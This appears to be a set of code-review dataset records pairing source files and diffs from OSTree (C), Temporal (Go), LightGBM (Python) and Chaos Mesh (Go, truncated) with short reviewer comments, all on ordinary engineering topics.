g_variant_get_data (summary), g_variant_get_size (summary), cancellable, error)) return FALSE; if (!ot_ensure_unlinked_at (self->repo_dir_fd, "summary.sig", error)) return FALSE; return TRUE; } /* Regenerate the summary if `core/auto-update-summary` is set. We default to FALSE for * this setting because OSTree supports multiple processes committing to the same repo (but * different refs) concurrently, and in fact gnome-continuous actually does this. In that * context it's best to update the summary explicitly once at the end of multiple * transactions instead of automatically here. `auto-update-summary` only updates * atomically within a transaction. */ gboolean _ostree_repo_maybe_regenerate_summary (OstreeRepo *self, GCancellable *cancellable, GError **error) { gboolean auto_update_summary; if (!ot_keyfile_get_boolean_with_default (self->config, "core", "auto-update-summary", FALSE, &auto_update_summary, error)) return FALSE; /* Deprecated alias for `auto-update-summary`. */ gboolean commit_update_summary; if (!ot_keyfile_get_boolean_with_default (self->config, "core", "commit-update-summary", FALSE, &commit_update_summary, error)) return FALSE; if ((auto_update_summary || commit_update_summary) && !ostree_repo_regenerate_summary (self, NULL, cancellable, error)) return FALSE; return TRUE; } gboolean _ostree_repo_has_staging_prefix (const char *filename) { return g_str_has_prefix (filename, OSTREE_REPO_TMPDIR_STAGING); } gboolean _ostree_repo_try_lock_tmpdir (int tmpdir_dfd, const char *tmpdir_name, GLnxLockFile *file_lock_out, gboolean *out_did_lock, GError **error) { g_autofree char *lock_name = g_strconcat (tmpdir_name, "-lock", NULL); gboolean did_lock = FALSE; g_autoptr(GError) local_error = NULL; /* We put the lock outside the dir, so we can hold the lock * until the directory is fully removed */ if (!glnx_make_lock_file (tmpdir_dfd, lock_name, LOCK_EX | LOCK_NB, file_lock_out, &local_error)) { /* we need to handle EACCES too in the case of POSIX locks; see 
F_SETLK in fcntl(2) */ if (g_error_matches (local_error, G_IO_ERROR, G_IO_ERROR_WOULD_BLOCK) || g_error_matches (local_error, G_IO_ERROR, G_IO_ERROR_PERMISSION_DENIED)) { did_lock = FALSE; } else { g_propagate_error (error, g_steal_pointer (&local_error)); return FALSE; } } else { /* It's possible that we got a lock after seeing the directory, but * another process deleted the tmpdir, so verify it still exists. */ struct stat stbuf; if (!glnx_fstatat_allow_noent (tmpdir_dfd, tmpdir_name, &stbuf, AT_SYMLINK_NOFOLLOW, error)) return FALSE; if (errno == 0 && S_ISDIR (stbuf.st_mode)) did_lock = TRUE; else glnx_release_lock_file (file_lock_out); } *out_did_lock = did_lock; return TRUE; } /* This allocates and locks a subdir of the repo tmp dir, using an existing * one with the same prefix if it is not in use already. */ gboolean _ostree_repo_allocate_tmpdir (int tmpdir_dfd, const char *tmpdir_prefix, GLnxTmpDir *tmpdir_out, GLnxLockFile *file_lock_out, gboolean *reusing_dir_out, GCancellable *cancellable, GError **error) { g_return_val_if_fail (_ostree_repo_has_staging_prefix (tmpdir_prefix), FALSE); /* Look for existing tmpdir (with same prefix) to reuse */ g_auto(GLnxDirFdIterator) dfd_iter = { 0, }; if (!glnx_dirfd_iterator_init_at (tmpdir_dfd, ".", FALSE, &dfd_iter, error)) return FALSE; gboolean reusing_dir = FALSE; gboolean did_lock = FALSE; g_auto(GLnxTmpDir) ret_tmpdir = { 0, }; while (!ret_tmpdir.initialized) { struct dirent *dent; g_autoptr(GError) local_error = NULL; if (!glnx_dirfd_iterator_next_dent (&dfd_iter, &dent, cancellable, error)) return FALSE; if (dent == NULL) break; if (!g_str_has_prefix (dent->d_name, tmpdir_prefix)) continue; /* Quickly skip non-dirs, if unknown we ignore ENOTDIR when opening instead */ if (dent->d_type != DT_UNKNOWN && dent->d_type != DT_DIR) continue; glnx_autofd int target_dfd = -1; if (!glnx_opendirat (dfd_iter.fd, dent->d_name, FALSE, &target_dfd, &local_error)) { if (g_error_matches (local_error, G_IO_ERROR, 
G_IO_ERROR_NOT_DIRECTORY) || g_error_matches (local_error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND)) continue; else { g_propagate_error (error, g_steal_pointer (&local_error)); return FALSE; } } /* We put the lock outside the dir, so we can hold the lock * until the directory is fully removed */ if (!_ostree_repo_try_lock_tmpdir (tmpdir_dfd, dent->d_name, file_lock_out, &did_lock, error)) return FALSE; if (!did_lock) continue; /* Touch the reused directory so that we don't accidentally * remove it due to being old when cleaning up the tmpdir. */ (void)futimens (target_dfd, NULL); /* We found an existing tmpdir which we managed to lock */ g_debug ("Reusing tmpdir %s", dent->d_name); reusing_dir = TRUE; ret_tmpdir.src_dfd = tmpdir_dfd; ret_tmpdir.fd = glnx_steal_fd (&target_dfd); ret_tmpdir.path = g_strdup (dent->d_name); ret_tmpdir.initialized = TRUE; } const char *tmpdir_name_template = glnx_strjoina (tmpdir_prefix, "XXXXXX"); while (!ret_tmpdir.initialized) { g_auto(GLnxTmpDir) new_tmpdir = { 0, }; /* No existing tmpdir found, create a new */ if (!glnx_mkdtempat (tmpdir_dfd, tmpdir_name_template, DEFAULT_DIRECTORY_MODE, &new_tmpdir, error)) return FALSE; /* Note, at this point we can race with another process that picks up this * new directory. If that happens we need to retry, making a new directory. */ if (!_ostree_repo_try_lock_tmpdir (new_tmpdir.src_dfd, new_tmpdir.path, file_lock_out, &did_lock, error)) return FALSE; if (!did_lock) { /* We raced and someone else already locked the newly created * directory. Free the resources here and then mark it as * uninitialized so glnx_tmpdir_cleanup doesn't delete the directory * when new_tmpdir goes out of scope. 
*/ glnx_tmpdir_unset (&new_tmpdir); new_tmpdir.initialized = FALSE; continue; } g_debug ("Using new tmpdir %s", new_tmpdir.path); ret_tmpdir = new_tmpdir; /* Transfer ownership */ new_tmpdir.initialized = FALSE; } *tmpdir_out = ret_tmpdir; /* Transfer ownership */ ret_tmpdir.initialized = FALSE; *reusing_dir_out = reusing_dir; return TRUE; } /* See ostree-repo-private.h for more information about this */ void _ostree_repo_memory_cache_ref_init (OstreeRepoMemoryCacheRef *state, OstreeRepo *repo) { state->repo = g_object_ref (repo); GMutex *lock = &repo->cache_lock; g_mutex_lock (lock); repo->dirmeta_cache_refcount++; if (repo->dirmeta_cache == NULL) repo->dirmeta_cache = g_hash_table_new_full (g_str_hash, g_str_equal, g_free, (GDestroyNotify)g_variant_unref); g_mutex_unlock (lock); } /* See ostree-repo-private.h for more information about this */ void _ostree_repo_memory_cache_ref_destroy (OstreeRepoMemoryCacheRef *state) { OstreeRepo *repo = state->repo; GMutex *lock = &repo->cache_lock; g_mutex_lock (lock); repo->dirmeta_cache_refcount--; if (repo->dirmeta_cache_refcount == 0) g_clear_pointer (&repo->dirmeta_cache, (GDestroyNotify) g_hash_table_unref); g_mutex_unlock (lock); g_object_unref (repo); } /** * ostree_repo_get_collection_id: * @self: an #OstreeRepo * * Get the collection ID of this repository. See [collection IDs][collection-ids]. * * Returns: (nullable): collection ID for the repository * Since: 2018.6 */ const gchar * ostree_repo_get_collection_id (OstreeRepo *self) { g_return_val_if_fail (OSTREE_IS_REPO (self), NULL); return self->collection_id; } /** * ostree_repo_set_collection_id: * @self: an #OstreeRepo * @collection_id: (nullable): new collection ID, or %NULL to unset it * @error: return location for a #GError, or %NULL * * Set or clear the collection ID of this repository. See [collection IDs][collection-ids]. * The update will be made in memory, but must be written out to the repository * configuration on disk using ostree_repo_write_config(). 
* * Returns: %TRUE on success, %FALSE otherwise * Since: 2018.6 */ gboolean ostree_repo_set_collection_id (OstreeRepo *self, const gchar *collection_id, GError **error) { if (collection_id != NULL && !ostree_validate_collection_id (collection_id, error)) return FALSE; g_autofree gchar *new_collection_id = g_strdup (collection_id); g_free (self->collection_id); self->collection_id = g_steal_pointer (&new_collection_id); if (self->config != NULL) { if (collection_id != NULL) g_key_file_set_string (self->config, "core", "collection-id", collection_id); else return g_key_file_remove_key (self->config, "core", "collection-id", error); } return TRUE; } /** * ostree_repo_get_default_repo_finders: * @self: an #OstreeRepo * * Get the set of default repo finders configured. See the documentation for * the "core.default-repo-finders" config key. * * Returns: (array zero-terminated=1) (element-type utf8): * %NULL-terminated array of strings. * Since: 2018.9 */ const gchar * const * ostree_repo_get_default_repo_finders (OstreeRepo *self) { g_return_val_if_fail (OSTREE_IS_REPO (self), NULL); return (const gchar * const *)self->repo_finders; } /** * ostree_repo_get_bootloader: * @self: an #OstreeRepo * * Get the bootloader configured. See the documentation for the * "sysroot.bootloader" config key. * * Returns: (transfer none): bootloader configuration for the sysroot * Since: 2019.2 */ const gchar * ostree_repo_get_bootloader (OstreeRepo *self) { g_return_val_if_fail (OSTREE_IS_REPO (self), NULL); return CFG_SYSROOT_BOOTLOADER_OPTS_STR[self->bootloader]; } /** * _ostree_repo_verify_bindings: * @collection_id: (nullable): Locally specified collection ID for the remote * the @commit was retrieved from, or %NULL if none is configured * @ref_name: (nullable): Ref name the commit was retrieved using, or %NULL if * the commit was retrieved by checksum * @commit: Commit data to check * @error: Return location for a #GError, or %NULL * * Verify the ref and collection bindings. 
* * The ref binding is verified only if it exists. But if we have the * collection ID specified in the remote configuration (@collection_id is * non-%NULL) then the ref binding must exist, otherwise the verification will * fail. Parts of the verification can be skipped by passing %NULL to the * @ref_name parameter (in case we requested a checksum directly, without * looking it up from a ref). * * The collection binding is verified only when we have collection ID * specified in the remote configuration. If it is specified, then the * binding must exist and must be equal to the remote repository * collection ID. * * Returns: %TRUE if bindings are correct, %FALSE otherwise * Since: 2017.14 */ gboolean _ostree_repo_verify_bindings (const char *collection_id, const char *ref_name, GVariant *commit, GError **error) { g_autoptr(GVariant) metadata = g_variant_get_child_value (commit, 0); g_autofree const char **refs = NULL; if (!g_variant_lookup (metadata, OSTREE_COMMIT_META_KEY_REF_BINDING, "^a&s", &refs)) { /* Early return here - if the remote collection ID is NULL, then * we certainly will not verify the collection binding in the * commit. 
*/ if (collection_id == NULL) return TRUE; return glnx_throw (error, "Expected commit metadata to have ref " "binding information, found none"); } if (ref_name != NULL) { if (!g_strv_contains ((const char *const *) refs, ref_name)) { g_autoptr(GString) refs_dump = g_string_new (NULL); const char *refs_str; if (refs != NULL && (*refs) != NULL) { for (const char **iter = refs; *iter != NULL; ++iter) { const char *ref = *iter; if (refs_dump->len > 0) g_string_append (refs_dump, ", "); g_string_append_printf (refs_dump, "‘%s’", ref); } refs_str = refs_dump->str; } else { refs_str = "no refs"; } return glnx_throw (error, "Commit has no requested ref ‘%s’ " "in ref binding metadata (%s)", ref_name, refs_str); } } if (collection_id != NULL) { const char *collection_id_binding; if (!g_variant_lookup (metadata, OSTREE_COMMIT_META_KEY_COLLECTION_BINDING, "&s", &collection_id_binding)) return glnx_throw (error, "Expected commit metadata to have collection ID " "binding information, found none"); if (!g_str_equal (collection_id_binding, collection_id)) return glnx_throw (error, "Commit has collection ID ‘%s’ in collection binding " "metadata, while the remote it came from has " "collection ID ‘%s’", collection_id_binding, collection_id); } return TRUE; }
1
19,210
Hmm, AFAICT `*out_variant` isn't explicitly set to `NULL` in the `ENOENT` case.
ostreedev-ostree
c
@@ -87,12 +87,18 @@ func (b *clientFactory) SDKClient(c *cli.Context, namespace string) sdkclient.Cl hostPort = localHostPort } + tlsConfig, err := b.createTLSConfig(c) + if err != nil { + b.logger.Fatal("Failed to create SDK client", zap.Error(err)) + } + sdkClient, err := sdkclient.NewClient(sdkclient.Options{ HostPort: hostPort, Namespace: namespace, Logger: log.NewZapAdapter(b.logger), ConnectionOptions: sdkclient.ConnectionOptions{ DisableHealthCheck: true, + TLS: tlsConfig, }, }) if err != nil {
1
// The MIT License // // Copyright (c) 2020 Temporal Technologies Inc. All rights reserved. // // Copyright (c) 2020 Uber Technologies, Inc. // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to deal // in the Software without restriction, including without limitation the rights // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell // copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN // THE SOFTWARE. 
package cli import ( "crypto/tls" "crypto/x509" "errors" "io/ioutil" "net" "github.com/urfave/cli" "go.temporal.io/api/workflowservice/v1" sdkclient "go.temporal.io/sdk/client" "go.uber.org/zap" "google.golang.org/grpc" "google.golang.org/grpc/credentials" "go.temporal.io/server/api/adminservice/v1" "go.temporal.io/server/common/auth" "go.temporal.io/server/common/log" ) // ClientFactory is used to construct rpc clients type ClientFactory interface { FrontendClient(c *cli.Context) workflowservice.WorkflowServiceClient AdminClient(c *cli.Context) adminservice.AdminServiceClient SDKClient(c *cli.Context, namespace string) sdkclient.Client } type clientFactory struct { logger *zap.Logger } // NewClientFactory creates a new ClientFactory func NewClientFactory() ClientFactory { logger, err := zap.NewDevelopment() if err != nil { panic(err) } return &clientFactory{ logger: logger, } } // FrontendClient builds a frontend client func (b *clientFactory) FrontendClient(c *cli.Context) workflowservice.WorkflowServiceClient { connection, _ := b.createGRPCConnection(c) return workflowservice.NewWorkflowServiceClient(connection) } // AdminClient builds an admin client (based on server side thrift interface) func (b *clientFactory) AdminClient(c *cli.Context) adminservice.AdminServiceClient { connection, _ := b.createGRPCConnection(c) return adminservice.NewAdminServiceClient(connection) } // AdminClient builds an admin client (based on server side thrift interface) func (b *clientFactory) SDKClient(c *cli.Context, namespace string) sdkclient.Client { hostPort := c.GlobalString(FlagAddress) if hostPort == "" { hostPort = localHostPort } sdkClient, err := sdkclient.NewClient(sdkclient.Options{ HostPort: hostPort, Namespace: namespace, Logger: log.NewZapAdapter(b.logger), ConnectionOptions: sdkclient.ConnectionOptions{ DisableHealthCheck: true, }, }) if err != nil { b.logger.Fatal("Failed to create SDK client", zap.Error(err)) } return sdkClient } func (b *clientFactory) 
createGRPCConnection(c *cli.Context) (*grpc.ClientConn, error) { hostPort := c.GlobalString(FlagAddress) if hostPort == "" { hostPort = localHostPort } // Ignoring error as we'll fail to dial anyway, and that will produce a meaningful error host, _, _ := net.SplitHostPort(hostPort) certPath := c.GlobalString(FlagTLSCertPath) keyPath := c.GlobalString(FlagTLSKeyPath) caPath := c.GlobalString(FlagTLSCaPath) hostNameVerification := c.GlobalBool(FlagTLSEnableHostVerification) grpcSecurityOptions := grpc.WithInsecure() var cert *tls.Certificate var caPool *x509.CertPool if caPath != "" { caCertPool, err := fetchCACert(caPath) if err != nil { b.logger.Fatal("Failed to load server CA certificate", zap.Error(err)) return nil, err } caPool = caCertPool } if certPath != "" { myCert, err := tls.LoadX509KeyPair(certPath, keyPath) if err != nil { b.logger.Fatal("Failed to load client certificate", zap.Error(err)) return nil, err } cert = &myCert } // If we are given arguments to verify either server or client, configure TLS if caPool != nil || cert != nil { tlsConfig := auth.NewTLSConfigForServer(host, hostNameVerification) if caPool != nil { tlsConfig.RootCAs = caPool } if cert != nil { tlsConfig.Certificates = []tls.Certificate{*cert} } grpcSecurityOptions = grpc.WithTransportCredentials(credentials.NewTLS(tlsConfig)) } connection, err := grpc.Dial(hostPort, grpcSecurityOptions) if err != nil { b.logger.Fatal("Failed to create connection", zap.Error(err)) return nil, err } return connection, nil } func fetchCACert(path string) (*x509.CertPool, error) { caPool := x509.NewCertPool() caBytes, err := ioutil.ReadFile(path) if err != nil { return nil, err } if !caPool.AppendCertsFromPEM(caBytes) { return nil, errors.New("unknown failure constructing cert pool for ca") } return caPool, nil }
1
10,517
Nit: "Failed to configure TLS for SDK client"?
temporalio-temporal
go
@@ -89,7 +89,7 @@ def test_plot_split_value_histogram(params, breast_cancer_split, train_data): title='Histogram for feature @index/name@ @feature@', xlabel='x', ylabel='y', color='r') assert isinstance(ax1, matplotlib.axes.Axes) - title = 'Histogram for feature name {}'.format(gbm1.booster_.feature_name()[27]) + title = f'Histogram for feature name {gbm1.booster_.feature_name()[27]}' assert ax1.get_title() == title assert ax1.get_xlabel() == 'x' assert ax1.get_ylabel() == 'y'
1
# coding: utf-8 import pytest from sklearn.model_selection import train_test_split import lightgbm as lgb from lightgbm.compat import GRAPHVIZ_INSTALLED, MATPLOTLIB_INSTALLED if MATPLOTLIB_INSTALLED: import matplotlib matplotlib.use('Agg') if GRAPHVIZ_INSTALLED: import graphviz from .utils import load_breast_cancer @pytest.fixture(scope="module") def breast_cancer_split(): return train_test_split(*load_breast_cancer(return_X_y=True), test_size=0.1, random_state=1) @pytest.fixture(scope="module") def train_data(breast_cancer_split): X_train, _, y_train, _ = breast_cancer_split return lgb.Dataset(X_train, y_train) @pytest.fixture def params(): return {"objective": "binary", "verbose": -1, "num_leaves": 3} @pytest.mark.skipif(not MATPLOTLIB_INSTALLED, reason='matplotlib is not installed') def test_plot_importance(params, breast_cancer_split, train_data): X_train, _, y_train, _ = breast_cancer_split gbm0 = lgb.train(params, train_data, num_boost_round=10) ax0 = lgb.plot_importance(gbm0) assert isinstance(ax0, matplotlib.axes.Axes) assert ax0.get_title() == 'Feature importance' assert ax0.get_xlabel() == 'Feature importance' assert ax0.get_ylabel() == 'Features' assert len(ax0.patches) <= 30 gbm1 = lgb.LGBMClassifier(n_estimators=10, num_leaves=3, silent=True) gbm1.fit(X_train, y_train) ax1 = lgb.plot_importance(gbm1, color='r', title='t', xlabel='x', ylabel='y') assert isinstance(ax1, matplotlib.axes.Axes) assert ax1.get_title() == 't' assert ax1.get_xlabel() == 'x' assert ax1.get_ylabel() == 'y' assert len(ax1.patches) <= 30 for patch in ax1.patches: assert patch.get_facecolor() == (1., 0, 0, 1.) # red ax2 = lgb.plot_importance(gbm0, color=['r', 'y', 'g', 'b'], title=None, xlabel=None, ylabel=None) assert isinstance(ax2, matplotlib.axes.Axes) assert ax2.get_title() == '' assert ax2.get_xlabel() == '' assert ax2.get_ylabel() == '' assert len(ax2.patches) <= 30 assert ax2.patches[0].get_facecolor() == (1., 0, 0, 1.) 
# r assert ax2.patches[1].get_facecolor() == (.75, .75, 0, 1.) # y assert ax2.patches[2].get_facecolor() == (0, .5, 0, 1.) # g assert ax2.patches[3].get_facecolor() == (0, 0, 1., 1.) # b @pytest.mark.skipif(not MATPLOTLIB_INSTALLED, reason='matplotlib is not installed') def test_plot_split_value_histogram(params, breast_cancer_split, train_data): X_train, _, y_train, _ = breast_cancer_split gbm0 = lgb.train(params, train_data, num_boost_round=10) ax0 = lgb.plot_split_value_histogram(gbm0, 27) assert isinstance(ax0, matplotlib.axes.Axes) assert ax0.get_title() == 'Split value histogram for feature with index 27' assert ax0.get_xlabel() == 'Feature split value' assert ax0.get_ylabel() == 'Count' assert len(ax0.patches) <= 2 gbm1 = lgb.LGBMClassifier(n_estimators=10, num_leaves=3, silent=True) gbm1.fit(X_train, y_train) ax1 = lgb.plot_split_value_histogram(gbm1, gbm1.booster_.feature_name()[27], figsize=(10, 5), title='Histogram for feature @index/name@ @feature@', xlabel='x', ylabel='y', color='r') assert isinstance(ax1, matplotlib.axes.Axes) title = 'Histogram for feature name {}'.format(gbm1.booster_.feature_name()[27]) assert ax1.get_title() == title assert ax1.get_xlabel() == 'x' assert ax1.get_ylabel() == 'y' assert len(ax1.patches) <= 2 for patch in ax1.patches: assert patch.get_facecolor() == (1., 0, 0, 1.) # red ax2 = lgb.plot_split_value_histogram(gbm0, 27, bins=10, color=['r', 'y', 'g', 'b'], title=None, xlabel=None, ylabel=None) assert isinstance(ax2, matplotlib.axes.Axes) assert ax2.get_title() == '' assert ax2.get_xlabel() == '' assert ax2.get_ylabel() == '' assert len(ax2.patches) == 10 assert ax2.patches[0].get_facecolor() == (1., 0, 0, 1.) # r assert ax2.patches[1].get_facecolor() == (.75, .75, 0, 1.) # y assert ax2.patches[2].get_facecolor() == (0, .5, 0, 1.) # g assert ax2.patches[3].get_facecolor() == (0, 0, 1., 1.) 
# b with pytest.raises(ValueError): lgb.plot_split_value_histogram(gbm0, 0) # was not used in splitting @pytest.mark.skipif(not MATPLOTLIB_INSTALLED or not GRAPHVIZ_INSTALLED, reason='matplotlib or graphviz is not installed') def test_plot_tree(breast_cancer_split): X_train, _, y_train, _ = breast_cancer_split gbm = lgb.LGBMClassifier(n_estimators=10, num_leaves=3, silent=True) gbm.fit(X_train, y_train, verbose=False) with pytest.raises(IndexError): lgb.plot_tree(gbm, tree_index=83) ax = lgb.plot_tree(gbm, tree_index=3, figsize=(15, 8), show_info=['split_gain']) assert isinstance(ax, matplotlib.axes.Axes) w, h = ax.axes.get_figure().get_size_inches() assert int(w) == 15 assert int(h) == 8 @pytest.mark.skipif(not GRAPHVIZ_INSTALLED, reason='graphviz is not installed') def test_create_tree_digraph(breast_cancer_split): X_train, _, y_train, _ = breast_cancer_split constraints = [-1, 1] * int(X_train.shape[1] / 2) gbm = lgb.LGBMClassifier(n_estimators=10, num_leaves=3, silent=True, monotone_constraints=constraints) gbm.fit(X_train, y_train, verbose=False) with pytest.raises(IndexError): lgb.create_tree_digraph(gbm, tree_index=83) graph = lgb.create_tree_digraph(gbm, tree_index=3, show_info=['split_gain', 'internal_value', 'internal_weight'], name='Tree4', node_attr={'color': 'red'}) graph.render(view=False) assert isinstance(graph, graphviz.Digraph) assert graph.name == 'Tree4' assert graph.filename == 'Tree4.gv' assert len(graph.node_attr) == 1 assert graph.node_attr['color'] == 'red' assert len(graph.graph_attr) == 0 assert len(graph.edge_attr) == 0 graph_body = ''.join(graph.body) assert 'leaf' in graph_body assert 'gain' in graph_body assert 'value' in graph_body assert 'weight' in graph_body assert '#ffdddd' in graph_body assert '#ddffdd' in graph_body assert 'data' not in graph_body assert 'count' not in graph_body @pytest.mark.skipif(not MATPLOTLIB_INSTALLED, reason='matplotlib is not installed') def test_plot_metrics(params, breast_cancer_split, train_data): 
X_train, X_test, y_train, y_test = breast_cancer_split test_data = lgb.Dataset(X_test, y_test, reference=train_data) params.update({"metric": {"binary_logloss", "binary_error"}}) evals_result0 = {} lgb.train(params, train_data, valid_sets=[train_data, test_data], valid_names=['v1', 'v2'], num_boost_round=10, evals_result=evals_result0, verbose_eval=False) ax0 = lgb.plot_metric(evals_result0) assert isinstance(ax0, matplotlib.axes.Axes) assert ax0.get_title() == 'Metric during training' assert ax0.get_xlabel() == 'Iterations' assert ax0.get_ylabel() in {'binary_logloss', 'binary_error'} ax0 = lgb.plot_metric(evals_result0, metric='binary_error') ax0 = lgb.plot_metric(evals_result0, metric='binary_logloss', dataset_names=['v2']) evals_result1 = {} lgb.train(params, train_data, num_boost_round=10, evals_result=evals_result1, verbose_eval=False) with pytest.raises(ValueError): lgb.plot_metric(evals_result1) gbm2 = lgb.LGBMClassifier(n_estimators=10, num_leaves=3, silent=True) gbm2.fit(X_train, y_train, eval_set=[(X_test, y_test)], verbose=False) ax2 = lgb.plot_metric(gbm2, title=None, xlabel=None, ylabel=None) assert isinstance(ax2, matplotlib.axes.Axes) assert ax2.get_title() == '' assert ax2.get_xlabel() == '' assert ax2.get_ylabel() == ''
1
30,659
please update your branch to the latest `master`. This change was already made in #4359
microsoft-LightGBM
cpp
@@ -18,6 +18,8 @@ import ( "crypto/sha1" "errors" "fmt" + "github.com/pingcap/chaos-mesh/controllers" + "time" "golang.org/x/sync/errgroup"
1
// Copyright 2019 PingCAP, Inc. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // See the License for the specific language governing permissions and // limitations under the License. package partition import ( "context" "crypto/sha1" "errors" "fmt" "golang.org/x/sync/errgroup" "github.com/go-logr/logr" "github.com/pingcap/chaos-mesh/api/v1alpha1" "github.com/pingcap/chaos-mesh/controllers/twophase" pb "github.com/pingcap/chaos-mesh/pkg/chaosdaemon/pb" "github.com/pingcap/chaos-mesh/pkg/utils" v1 "k8s.io/api/core/v1" k8sError "k8s.io/apimachinery/pkg/api/errors" "k8s.io/apimachinery/pkg/types" "k8s.io/client-go/tools/cache" ctrl "sigs.k8s.io/controller-runtime" "sigs.k8s.io/controller-runtime/pkg/client" ) const ( networkPartitionActionMsg = "part network for %s" sourceIpSetPostFix = "src" targetIpSetPostFix = "tgt" ) func NewReconciler(c client.Client, log logr.Logger, req ctrl.Request) twophase.Reconciler { return twophase.Reconciler{ InnerReconciler: &Reconciler{ Client: c, Log: log, }, Client: c, Log: log, } } type Reconciler struct { client.Client Log logr.Logger } func (r *Reconciler) Object() twophase.InnerObject { return &v1alpha1.NetworkChaos{} } // Apply is a functions used to apply partition chaos. 
func (r *Reconciler) Apply(ctx context.Context, req ctrl.Request, chaos twophase.InnerObject) error { r.Log.Info("applying network partition") networkchaos, ok := chaos.(*v1alpha1.NetworkChaos) if !ok { err := errors.New("chaos is not NetworkChaos") r.Log.Error(err, "chaos is not NetworkChaos", "chaos", chaos) return err } sources, err := utils.SelectAndGeneratePods(ctx, r.Client, &networkchaos.Spec) if err != nil { r.Log.Error(err, "failed to select and generate pods") return err } targets, err := utils.SelectAndGeneratePods(ctx, r.Client, &networkchaos.Spec.Target) if err != nil { r.Log.Error(err, "failed to select and generate pods") return err } sourceSet := r.generateSet(sources, networkchaos, sourceIpSetPostFix) targetSet := r.generateSet(targets, networkchaos, targetIpSetPostFix) allPods := append(sources, targets...) // Set up ipset in every related pods g := errgroup.Group{} for index := range allPods { pod := allPods[index] r.Log.Info("PODS", "name", pod.Name, "namespace", pod.Namespace) g.Go(func() error { err := r.flushPodIPSet(ctx, &pod, sourceSet, networkchaos) if err != nil { return err } r.Log.Info("flush ipset on pod", "name", pod.Name, "namespace", pod.Namespace) return r.flushPodIPSet(ctx, &pod, targetSet, networkchaos) }) } if err = g.Wait(); err != nil { r.Log.Error(err, "flush pod ipset error") return err } if networkchaos.Spec.Direction == v1alpha1.To || networkchaos.Spec.Direction == v1alpha1.Both { if err := r.BlockSet(ctx, sources, targetSet, pb.Rule_OUTPUT, networkchaos); err != nil { r.Log.Error(err, "set source iptables failed") return err } if err := r.BlockSet(ctx, targets, sourceSet, pb.Rule_INPUT, networkchaos); err != nil { r.Log.Error(err, "set target iptables failed") return err } } if networkchaos.Spec.Direction == v1alpha1.From || networkchaos.Spec.Direction == v1alpha1.Both { if err := r.BlockSet(ctx, sources, targetSet, pb.Rule_INPUT, networkchaos); err != nil { r.Log.Error(err, "set source iptables failed") return err } if 
err := r.BlockSet(ctx, targets, sourceSet, pb.Rule_OUTPUT, networkchaos); err != nil { r.Log.Error(err, "set target iptables failed") return err } } networkchaos.Status.Experiment.Pods = []v1alpha1.PodStatus{} for _, pod := range allPods { ps := v1alpha1.PodStatus{ Namespace: pod.Namespace, Name: pod.Name, HostIP: pod.Status.HostIP, PodIP: pod.Status.PodIP, Action: string(networkchaos.Spec.Action), Message: fmt.Sprintf(networkPartitionActionMsg, *networkchaos.Spec.Duration), } networkchaos.Status.Experiment.Pods = append(networkchaos.Status.Experiment.Pods, ps) } return nil } func (r *Reconciler) BlockSet(ctx context.Context, pods []v1.Pod, set pb.IpSet, direction pb.Rule_Direction, networkchaos *v1alpha1.NetworkChaos) error { g := errgroup.Group{} sourceRule := r.generateIPTables(pb.Rule_ADD, direction, set.Name) for index := range pods { pod := &pods[index] key, err := cache.MetaNamespaceKeyFunc(pod) if err != nil { return err } switch direction { case pb.Rule_INPUT: networkchaos.Finalizers = utils.InsertFinalizer(networkchaos.Finalizers, "input-"+key) case pb.Rule_OUTPUT: networkchaos.Finalizers = utils.InsertFinalizer(networkchaos.Finalizers, "output"+key) } g.Go(func() error { return r.sendIPTables(ctx, pod, sourceRule, networkchaos) }) } return g.Wait() } func (r *Reconciler) Recover(ctx context.Context, req ctrl.Request, chaos twophase.InnerObject) error { networkchaos, ok := chaos.(*v1alpha1.NetworkChaos) if !ok { err := errors.New("chaos is not NetworkChaos") r.Log.Error(err, "chaos is not NetworkChaos", "chaos", chaos) return err } err := r.cleanFinalizersAndRecover(ctx, networkchaos) if err != nil { r.Log.Error(err, "cleanFinalizersAndRecover failed") return err } return nil } func (r *Reconciler) generateSetName(networkchaos *v1alpha1.NetworkChaos, namePostFix string) string { r.Log.Info("generating name for chaos", "name", networkchaos.Name) originalName := networkchaos.Name var ipsetName string if len(originalName) < 6 { ipsetName = originalName + "_" 
+ namePostFix } else { namePrefix := originalName[0:5] nameRest := originalName[5:] hasher := sha1.New() hasher.Write([]byte(nameRest)) hashValue := fmt.Sprintf("%x", hasher.Sum(nil)) // keep the length does not exceed 27 ipsetName = namePrefix + "_" + hashValue[0:17] + "_" + namePostFix } r.Log.Info("name generated", "ipsetName", ipsetName) return ipsetName } func (r *Reconciler) generateSet(pods []v1.Pod, networkchaos *v1alpha1.NetworkChaos, namePostFix string) pb.IpSet { name := r.generateSetName(networkchaos, namePostFix) ips := make([]string, 0, len(pods)) for _, pod := range pods { if len(pod.Status.PodIP) > 0 { ips = append(ips, pod.Status.PodIP) } } r.Log.Info("creating ipset", "name", name, "ips", ips) return pb.IpSet{ Name: name, Ips: ips, } } func (r *Reconciler) generateIPTables(action pb.Rule_Action, direction pb.Rule_Direction, set string) pb.Rule { return pb.Rule{ Action: action, Direction: direction, Set: set, } } func (r *Reconciler) cleanFinalizersAndRecover(ctx context.Context, networkchaos *v1alpha1.NetworkChaos) error { if len(networkchaos.Finalizers) == 0 { return nil } for _, key := range networkchaos.Finalizers { direction := key[0:6] podKey := key[6:] ns, name, err := cache.SplitMetaNamespaceKey(podKey) if err != nil { return err } var pod v1.Pod err = 